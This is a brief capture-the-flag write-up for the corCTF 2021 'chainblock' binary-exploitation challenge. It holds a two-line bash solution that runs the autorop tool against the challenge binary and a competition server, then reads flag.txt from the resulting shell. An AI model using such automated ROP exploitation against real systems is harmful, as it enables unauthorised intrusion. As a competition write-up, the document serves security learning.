Tags: rop exploitation pwn autorop corctf
Rating:
[Original](https://github.com/Valmarelox/ctf/blob/master/walkups/corctf-2021/chainblock/exploit.sh)
Pretty straight forward thanks to [autorop](https://github.com/mariuszskon/autorop)
```bash
autorop ./chainblock pwn.be.ax 5000
cat flag.txt
```